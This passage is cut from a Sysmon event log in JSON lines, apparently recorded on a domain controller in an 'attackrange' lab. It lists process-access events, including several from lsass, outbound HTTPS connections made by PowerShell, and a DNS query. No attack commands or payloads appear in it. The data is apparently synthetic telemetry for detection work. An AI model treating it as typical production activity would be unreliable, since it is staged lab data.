C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C3-5F25-0000-001096CF0600}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C3-5F25-0000-001096CF0600}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4921,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.704\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52648\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 104.117.16.77\r\nDestinationHostname: a104-117-16-77.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.704","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52648","DestinationIsIpv6":"false","DestinationIp":"104.117.16.77","DestinationHostname":"a104-117-16-77.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4922,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.838\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52649\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.838","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52649","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.084\r\nSourceProcessGUID: {E2A3D6B1-11C3-5F25-0000-001096CF0600}\r\nSourceProcessId: 4564\r\nSourceThreadId: 4552\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.084","SourceProcessGUID":"{E2A3D6B1-11C3-5F25-0000-001096CF0600}","SourceProcessId":"4564","SourceThreadId":"4552","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4924,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.829\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.829","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.256\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.256","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
